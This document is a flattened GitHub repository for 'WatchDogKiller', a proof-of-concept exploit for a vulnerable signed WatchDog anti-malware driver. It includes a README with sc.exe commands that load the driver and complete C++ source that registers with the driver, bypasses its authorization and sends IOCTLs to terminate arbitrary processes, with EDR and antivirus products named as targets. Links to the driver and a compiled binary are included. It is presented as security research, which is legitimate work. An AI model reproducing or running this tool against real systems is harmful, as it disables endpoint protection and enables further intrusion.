├── WatchDogKiller
├── x64
│ ├── Debug
│ │ ├── WatchDogKiller.log
│ │ ├── WatchDogKiller.vcxproj.FileListAbsolute.txt
│ │ ├── WatchDogKiller.exe.recipe
│ │ └── WatchDogKiller.Build.CppClean.log
│ └── Release
│ │ ├── vc143.pdb
│ │ ├── WatchDogKiller.obj
│ │ ├── WatchDogKiller.iobj
│ │ ├── WatchDogKiller.ipdb
│ │ ├── WatchDogKiller.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── link.read.1.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── link.write.1.tlog
│ │ ├── link.command.1.tlog
│ │ ├── Cl.items.tlog
│ │ ├── WatchDogKiller.lastbuildstate
│ │ └── link.secondary.1.tlog
│ │ ├── WatchDogKiller.log
│ │ └── WatchDogKiller.exe.recipe
├── WatchDogKiller.vcxproj.user
├── WatchDogKiller.vcxproj.filters
├── WatchDogKiller.cpp
└── WatchDogKiller.vcxproj
├── wamsdk.sys
├── x64
└── Release
│ ├── WatchDogKiller.exe
│ └── WatchDogKiller.pdb
├── WatchDogKiller.sln
└── README.md
/WatchDogKiller/x64/Debug/WatchDogKiller.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Debug/WatchDogKiller.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/wamsdk.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/wamsdk.sys
--------------------------------------------------------------------------------
/x64/Release/WatchDogKiller.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/x64/Release/WatchDogKiller.exe
--------------------------------------------------------------------------------
/x64/Release/WatchDogKiller.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/x64/Release/WatchDogKiller.pdb
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/vc143.pdb
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.obj
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.iobj
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.ipdb
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/WatchDogKiller/WatchDogKiller.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/Cl.items.tlog:
--------------------------------------------------------------------------------
1 | D:\Visual Studio Projects\CETP\WatchDogKiller\WatchDogKiller\WatchDogKiller.cpp;D:\Visual Studio Projects\CETP\WatchDogKiller\WatchDogKiller\x64\Release\WatchDogKiller.obj
2 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/WatchDogKiller.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.42.34433:TargetPlatformVersion=10.0.26100.0:
2 | Release|x64|D:\Visual Studio Projects\CETP\WatchDogKiller\|
3 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/link.secondary.1.tlog:
--------------------------------------------------------------------------------
1 | ^D:\VISUAL STUDIO PROJECTS\CETP\WATCHDOGKILLER\WATCHDOGKILLER\X64\RELEASE\WATCHDOGKILLER.OBJ
2 | D:\Visual Studio Projects\CETP\WatchDogKiller\WatchDogKiller\x64\Release\WatchDogKiller.IPDB
3 | D:\Visual Studio Projects\CETP\WatchDogKiller\WatchDogKiller\x64\Release\WatchDogKiller.iobj
4 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.log:
--------------------------------------------------------------------------------
1 | WatchDogKiller.cpp
2 | Generating code
3 | Previous IPDB not found, fall back to full compilation.
4 | All 7 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
5 | Finished generating code
6 | WatchDogKiller.vcxproj -> D:\Visual Studio Projects\CETP\WatchDogKiller\x64\Release\WatchDogKiller.exe
7 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Debug/WatchDogKiller.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | D:\Visual Studio Projects\CETP\WatchDogKiller\x64\Debug\WatchDogKiller.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | D:\Visual Studio Projects\CETP\WatchDogKiller\x64\Release\WatchDogKiller.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/WatchDogKiller/WatchDogKiller.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/WatchDogKiller.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.12.35514.174 d17.12
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WatchDogKiller", "WatchDogKiller\WatchDogKiller.vcxproj", "{78B504FC-8616-4AE5-A00C-03C005AA820D}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Debug|x64.ActiveCfg = Debug|x64
17 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Debug|x64.Build.0 = Debug|x64
18 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Debug|x86.ActiveCfg = Debug|Win32
19 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Debug|x86.Build.0 = Debug|Win32
20 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Release|x64.ActiveCfg = Release|x64
21 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Release|x64.Build.0 = Release|x64
22 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Release|x86.ActiveCfg = Release|Win32
23 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | EndGlobal
29 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Debug/WatchDogKiller.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\vc143.pdb
2 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\vc143.idb
3 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.obj
4 | d:\visual studio projects\cetp\watchdogkiller\x64\debug\watchdogkiller.exe
5 | d:\visual studio projects\cetp\watchdogkiller\x64\debug\watchdogkiller.pdb
6 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.ilk
7 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\cl.command.1.tlog
8 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\cl.items.tlog
9 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\cl.read.1.tlog
10 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\cl.write.1.tlog
11 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\link.command.1.tlog
12 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\link.read.1.tlog
13 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\link.secondary.1.tlog
14 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\link.write.1.tlog
15 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # WatchDogKiller – Weaponizing the WatchDog Anti-Malware Driver Vulnerability
2 |
3 | ## 📖 Research Article
4 | This repository is the Proof-of-Concept (PoC) accompanying my technical write-up on the WatchDog Anti-Malware (amsdk.sys) BYOVD vulnerability.
5 | 👉 Full research available here: [Researching an APT Attack and Weaponizing It: The WatchDog BYOVD Story](https://medium.com/@jehadbudagga/researching-an-apt-attack-and-weaponizing-it-56daabee11c9)
6 |
7 | ---
8 |
9 | ## ⚡ Overview
10 | The Silver Fox APT group leveraged a vulnerable Microsoft-signed driver (`wamsdk.sys`) in recent attacks to disable security products.
11 | I reversed the latest WatchDog driver (`amsdk.sys v1.1.100`) and discovered that the arbitrary process termination vulnerability was still exploitable.
12 |
13 | The driver as of this date 11/9/2025 isnt listed on either LolDriver or HVCI blocked
14 |
15 | This PoC demonstrates:
16 | - Registering a process with the driver (`IOCTL_REGISTER_PROCESS`)
17 | - Using the termination routine (`IOCTL_TERMINATE_PROCESS`)
18 | - Bypassing the driver’s authorization mechanism
19 | - Killing protected EDR/AV processes (Bitdefender, Sophos, Kaspersky, etc.)
20 |
21 | ---
22 |
23 | ## 🛠️ Usage
24 | > ⚠️ **Disclaimer**: This code is for educational and research purposes only. Do not use it on systems you do not own.
25 |
26 | 1. Load the vulnerable driver:
27 | ```powershell
28 | sc.exe create killer binPath="C:\Path\To\wamsdk.sys" type=kernel
29 | sc.exe start killer
30 | ```
31 |
32 | 2. Run the PoC
33 | ```
34 | .\WatchDogKiller.exe
35 |
36 | WatchDog EDR Terminator Tool @j3h4ck
37 | ================================================
38 |
39 | Successfully opened Zam device
40 | Attempting to register process 9444...
41 | Successfully registered process 9444
42 |
43 | Enter PID to terminate: 30724
44 | Wait for process exit? (0 = No, 1 = Yes): 0
45 |
46 | Attempting to terminate PID 30724...
47 | Successfully sent terminate request for PID 30724
48 | Terminate request completed successfully.
49 |
50 | Enter PID to terminate:
51 | ```
52 | ## References
53 | - Research Article: https://medium.com/p/56daabee11c9/
54 | - The Hacker News – Silver Fox Exploits Microsoft-Signed Driver: https://thehackernews.com/2025/09/silver-fox-exploits-microsoft-signed.html
55 |
56 | ---
57 |
58 | ## Author
59 | Jehad Abudagga
60 | - LinkedIn: https://www.linkedin.com/in/jehadabudagga/
61 | - GitHub: https://github.com/j3h4ck
62 |
63 | ---
64 |
65 | ## Disclaimer
66 | This project is released for educational and security research purposes only.
67 | The author does not endorse or condone the misuse of this information.
68 |
--------------------------------------------------------------------------------
/WatchDogKiller/WatchDogKiller.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | // Define the IOCTL codes
6 | #define IOCTL_REGISTER_PROCESS 0x80002010
7 | #define IOCTL_TERMINATE_PROCESS 0x80002048
8 |
9 | // Define the device names
10 | #define ZAM_DEVICE_NAME L"\\\\.\\amsdk"
11 | #define ZAM_GUARD_DEVICE_NAME L"\\\\.\\B5A6B7C9-1E31-4E62-91CB-6078ED1E9A4F"
12 |
13 | // Define NTSTATUS values
14 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
15 | #define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)
16 | #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
17 |
18 | typedef struct _TERMINATE_PROCESS_REQUEST {
19 | DWORD ProcessId;
20 | DWORD WaitForExit;
21 | } TERMINATE_PROCESS_REQUEST, * PTERMINATE_PROCESS_REQUEST;
22 |
23 | HANDLE OpenZamDevice() {
24 | HANDLE hDevice = CreateFileW(
25 | ZAM_DEVICE_NAME,
26 | GENERIC_READ | GENERIC_WRITE,
27 | FILE_SHARE_READ | FILE_SHARE_WRITE,
28 | NULL,
29 | OPEN_EXISTING,
30 | FILE_ATTRIBUTE_NORMAL,
31 | NULL
32 | );
33 |
34 | if (hDevice == INVALID_HANDLE_VALUE) {
35 | hDevice = CreateFileW(
36 | ZAM_GUARD_DEVICE_NAME,
37 | GENERIC_READ | GENERIC_WRITE,
38 | FILE_SHARE_READ | FILE_SHARE_WRITE,
39 | NULL,
40 | OPEN_EXISTING,
41 | FILE_ATTRIBUTE_NORMAL,
42 | NULL
43 | );
44 | }
45 |
46 | return hDevice;
47 | }
48 |
49 | BOOL RegisterCurrentProcess(HANDLE hDevice) {
50 | DWORD bytesReturned = 0;
51 | DWORD pid = GetCurrentProcessId();
52 |
53 | printf("Attempting to register process %d...\n", pid);
54 |
55 | BOOL result = DeviceIoControl(
56 | hDevice,
57 | IOCTL_REGISTER_PROCESS,
58 | &pid,
59 | sizeof(pid),
60 | NULL,
61 | 0,
62 | &bytesReturned,
63 | NULL
64 | );
65 |
66 | if (result) {
67 | printf("Successfully registered process %d\n", pid);
68 | }
69 | else {
70 | printf("Failed to register process. Error: %d\n", GetLastError());
71 | }
72 |
73 | return result;
74 | }
75 |
76 | BOOL TerminateProcessByPid(HANDLE hDevice, DWORD pid, BOOL waitForExit) {
77 | DWORD bytesReturned = 0;
78 |
79 | TERMINATE_PROCESS_REQUEST request;
80 | request.ProcessId = pid;
81 | request.WaitForExit = waitForExit ? 1 : 0;
82 |
83 | BOOL result = DeviceIoControl(
84 | hDevice,
85 | IOCTL_TERMINATE_PROCESS,
86 | &request,
87 | sizeof(request),
88 | NULL,
89 | 0,
90 | &bytesReturned,
91 | NULL
92 | );
93 |
94 | if (result) {
95 | printf("Successfully sent terminate request for PID %d\n", pid);
96 | }
97 | else {
98 | printf("Failed to terminate process. Error: %d\n", GetLastError());
99 | }
100 |
101 | return result;
102 | }
103 |
104 | int main() {
105 | DWORD pid;
106 | int waitOption;
107 | char input[256];
108 |
109 | printf("WatchDog EDR Terminator Tool @j3h4ck\n");
110 | printf("================================================\n\n");
111 |
112 | // Open device
113 | HANDLE hDevice = OpenZamDevice();
114 | if (hDevice == INVALID_HANDLE_VALUE) {
115 | printf("Failed to open Zam device. Error: %d\n", GetLastError());
116 | return 1;
117 | }
118 | printf("Successfully opened Zam device\n");
119 |
120 | // Bypass authentication by registering first
121 | if (!RegisterCurrentProcess(hDevice)) {
122 | printf("Authentication bypass failed. Trying without registration...\n");
123 | }
124 | while (true) {
125 | // Get target PID
126 | printf("\nEnter PID to terminate: ");
127 | if (fgets(input, sizeof(input), stdin) == NULL) {
128 | printf("Error reading input.\n");
129 | CloseHandle(hDevice);
130 | return 1;
131 | }
132 | pid = strtoul(input, NULL, 10);
133 |
134 | printf("Wait for process exit? (0 = No, 1 = Yes): ");
135 | if (fgets(input, sizeof(input), stdin) == NULL) {
136 | printf("Error reading input.\n");
137 | CloseHandle(hDevice);
138 | return 1;
139 | }
140 | waitOption = atoi(input);
141 |
142 | printf("\nAttempting to terminate PID %lu...\n", pid);
143 |
144 | // Try to terminate
145 | if (TerminateProcessByPid(hDevice, pid, waitOption)) {
146 | printf("Terminate request completed successfully.\n");
147 | }
148 | else {
149 | printf("Terminate request failed.\n");
150 | }
151 | }
152 | CloseHandle(hDevice);
153 | return 0;
154 | }
--------------------------------------------------------------------------------
/WatchDogKiller/WatchDogKiller.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 17.0
23 | Win32Proj
24 | {78b504fc-8616-4ae5-a00c-03c005aa820d}
25 | WatchDogKiller
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | true
118 | true
119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 | MultiThreaded
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
--------------------------------------------------------------------------------